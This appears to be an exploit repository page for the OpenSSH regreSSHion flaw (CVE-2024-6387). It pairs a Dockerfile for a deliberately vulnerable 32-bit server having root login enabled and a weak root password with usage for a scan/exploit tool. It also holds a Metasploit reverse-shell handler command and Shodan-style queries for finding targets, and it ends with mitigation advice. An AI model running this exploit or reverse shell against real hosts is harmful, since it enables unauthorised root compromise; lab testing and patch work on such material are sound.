来源

关联漏洞

介绍

# Summary

This is essentially a statistical vulnerability: a large number of attempts are required to win the race condition and successfully execute arbitrary code. Attackers need to overcome many obstacles, Schwartz told SecurityWeek. "Even in the best-case scenario, the most well-known vulnerability takes over 4 hours to exploit."

In the release notes for OpenSSH 9.8, developers noted that the vulnerability has only been confirmed on 32-bit Linux systems based on glibc, and OpenBSD is not affected.

# Environment Setup

The environment is set up using Docker.

## 1. Writing the Dockerfile

```dockerfile
# 1.1. Writing the Dockerfile
FROM i386/ubuntu:20.04
ENV DEBIAN_FRONTEND=noninteractive
RUN dpkg --add-architecture i386 && apt-get update && apt-get install -y \
    build-essential \
    wget \
    curl \
    libssl-dev:i386 \
    zlib1g-dev:i386
RUN groupadd sshd && useradd -g sshd -s /bin/false sshd
RUN wget https://cdn.openbsd.org/pub/OpenBSD/OpenSSH/portable/openssh-9.2p1.tar.gz && \
    tar -xzf openssh-9.2p1.tar.gz && \
    cd openssh-9.2p1 && \
    ./configure && make && make install
RUN mkdir /var/run/sshd
RUN echo 'root:password' | chpasswd
RUN sed -i 's/#PermitRootLogin prohibit-password/PermitRootLogin yes/' /usr/local/etc/sshd_config && \
    sed -i 's/#PasswordAuthentication yes/PasswordAuthentication yes/' /usr/local/etc/sshd_config && \
    echo 'MaxStartups 100:30:200' >> /usr/local/etc/sshd_config
RUN echo '#!/bin/bash\n/usr/local/sbin/sshd -V' > /show_version.sh && \
    chmod +x /show_version.sh
EXPOSE 22
CMD ["/usr/local/sbin/sshd", "-D"]
```

## 2. Building the Docker Image
```
sudo docker build --platform=linux/386 -t vulnerable-openssh:9.2p1 .
```

## 3. Running the Docker Container
```
sudo docker run --platform=linux/386 -d -p 2222:22 --name vuln-ssh-32bit vulnerable-openssh:9.2p1
```

<div align="right">
  <a href="https://visitorbadge.io/status?path=https%3A%2F%2Fgithub.com%2Fl0n3m4n%2FCVE-2024-6387"><img src="https://api.visitorbadge.io/api/visitors?path=https%3A%2F%2Fgithub.com%2Faster-lvdw%2FCVE-2024-6387&label=Visitors&countColor=%2337d67a"/>
  </a>
</div>


# ![openssh](/img/openssh_logo.png) CVE-2024-6387.py - PoC     

## Important Notes!!!
> The exploit works ONLY for 32-bit OpenSSH-Servers. This is due to the POC uses 32-bit pointers!
> It is also known that some versions are already patched, and not every server is vulnerable. 
> Tested on: Kali Linux, ParrotSec, Ubuntu 22.04

## 📜 Description
Remote Unauthenticated Code Execution Vulnerability in OpenSSH server

CVE-2024-6387.py is a lightweight, efficient tool designed to identify servers running vulnerable versions of OpenSSH, specifically targeting the recently discovered `regreSSHion` vulnerability (CVE-2024-6387). This script facilitates rapid scanning of multiple IP addresses, domain names, and CIDR network ranges to detect potential vulnerabilities and ensure your infrastructure is secure.

A signal handler race condition was found in OpenSSH's server (sshd), where a client does not authenticate within LoginGraceTime seconds (120 by default, 600 in old OpenSSH versions), then sshd's SIGALRM handler is called asynchronously. However, this signal handler calls various functions that are not async-signal-safe, for example, syslog().

## 📁 Table of Contents
- 📖 [Details](#-details)
- 🌟 [Features](#-features)
- ⚙️ [Usage](#-usage)
- O [Output](#-output)
- 🔍 [Host Discovery](#-host-discovery)
- 🛠️ [Mitigation](#-mitigation)
- 💁 [References](#-references)
- 📌 [Author](#-author)
- 📢 [Disclaimer](#-disclaimer)
 

## ✍🏻 Details
You can find the technical details [here](https://www.qualys.com/2024/07/01/cve-2024-6387/regresshion.txt).

The flaw, discovered by researchers at Qualys in `May 2024`, and assigned the identifier CVE-2024-6387, is due to a signal handler race condition in sshd that allows unauthenticated remote attackers to execute arbitrary code as root.

"If a client does not authenticate within LoginGraceTime seconds (120 by default), then sshd's SIGALRM handler is called asynchronously and calls various functions that are not async-signal-safe," 

"A remote unauthenticated attacker can take advantage of this flaw to execute arbitrary code with root privileges."

## 🌟 Features

- **Rapid Scanning**: Quickly scan multiple IP addresses, domain names, and CIDR ranges for the CVE-2024-6387 vulnerability.
- **Banner Retrieval**: Efficiently retrieves SSH banners without authentication.
- **Grace Time Detection**: Optionally detect if servers have mitigated vulnerabilities using the LoginGraceTime setting.
- **IPv6 Support**: Fully supports IPv6 addresses for both direct and hostname-based scanning.
- **Multi-threading**: Uses threading for concurrent checks, significantly reducing scan times.
- **Detailed Output**: Provides clear, emoji-coded output summarizing scan results.
- **Port Check**: Identifies closed ports and provides a summary of non-responsive hosts.
- **Patched Versions Detection**: Recognizes and excludes known patched versions from vulnerability reports.

## ⚙️ Usage
## Scanning OpenSSH Server  
> Requirement: python3 latest
```bash
### Command Line Arguments
mode: Selects the operation mode. Choices are scan or exploit.
-T, --targets: IP addresses, domain names, file paths containing IP addresses, or CIDR network ranges.
-f, --outputfile: File to save results to (e.g., result.json).
-g, --gracetimecheck: Time in seconds to wait after identifying the version to check for LoginGraceTime mitigation (default: 120 seconds).
-n, --nic: Network NIC (default: 'eth0').
-o, --output: Output format for results (choices: 'csv', 'txt', 'json').
-p, --port: Port number to check or exploit (default: 22).
-s, --speed: Number of threads to increase race condition chances (default: 10).
-t, --timeout: Connection timeout in seconds (default: 1 second).
-H, --resolve-hostnames: Resolve Hostnames
```

### Examples

#### Scanning a single URL/IP

```bash
python3 CVE-2024-6387.py scan -T example.com -p 22
```

#### Running the exploit into one domain / ip

```bash
python3 CVE-2024-6387.py exploit -T example.com -p 22 -n eth0

```

# Escalation Process

### Catching payload
All you have to do is to run the command below first (change the {yourip} handler) and run the exploit afterwards with the command above 
```bash
msfconsole -q -x "use exploit/multi/handler; set PAYLOAD linux/x64/meterpreter/reverse_tcp; set LHOST {yourip}; set LPORT 9999; exploit -j"
```

## Output
The tool provides color-coded output to the console for better readability:

Green: Successful connection or operation.
Red: Failed connection or error.
Yellow: Warnings or noteworthy information.
Cyan: General information or status updates.

## 🔍 Host Discovery 
- **Hunter**: `/product.name="OpenSSH"`
- **FOFA**: `app="OpenSSH"`
- **SHODAN**: `product:"OpenSSH"`
- **CENSYS**: `(openssh) and labels=remote-access`

## 🛠️ Mitigation
- **Patch Management**: Swiftly applying available patches for OpenSSH is critical to closing the vulnerability gap. Timely patching ensures that known exploits cannot be leveraged against your systems, thereby reducing the window of opportunity for attackers.

- **Enhanced Access Control**: Limiting SSH access through network-based controls adds an additional layer of defense. This approach minimizes exposure to potential attackers by restricting SSH connections to only authorized networks or IP addresses. Implementing tools like firewall rules or using VPNs for secure access can effectively enforce these restrictions.

- **Network Segmentation**: Dividing your network into segments helps contain the impact of a potential breach. By segmenting critical systems and sensitive data from less critical parts of your network, you reduce the risk of lateral movement by attackers. This segmentation can be complemented with strict access controls and monitoring to detect and respond to any unauthorized attempts to breach these segments.

- **Intrusion Detection Systems (IDS)**: Deploying IDS or intrusion prevention systems (IPS) enables real-time monitoring of network traffic and system logs. These systems can detect suspicious activities and potential exploitation attempts associated with the regreSSHion vulnerability. Alerts triggered by such systems allow for prompt investigation and mitigation before significant damage can occur.

- **Monitoring for Exploitation Attempts**: Continuous monitoring of network and system logs is crucial. Look for any unusual patterns or activities that could indicate an attempt to exploit the OpenSSH vulnerability. This proactive approach helps in identifying and responding to threats before they can cause harm.

文件快照

 [4.0K]  /data/pocs/de250fb7bcc6b345c8cfffc2ab66fd7c54045436
├── [ 15K]  7etsuo-regreSSHion.c
├── [ 18K]  CVE-2024-6387.py
├── [1.3K]  Dockerfile
├── [4.0K]  img
│   └── [5.5K]  openssh_logo.png
├── [1.1K]  LICENSE
├── [8.5K]  README.md
└── [   0]  targets.txt

1 directory, 7 files

备注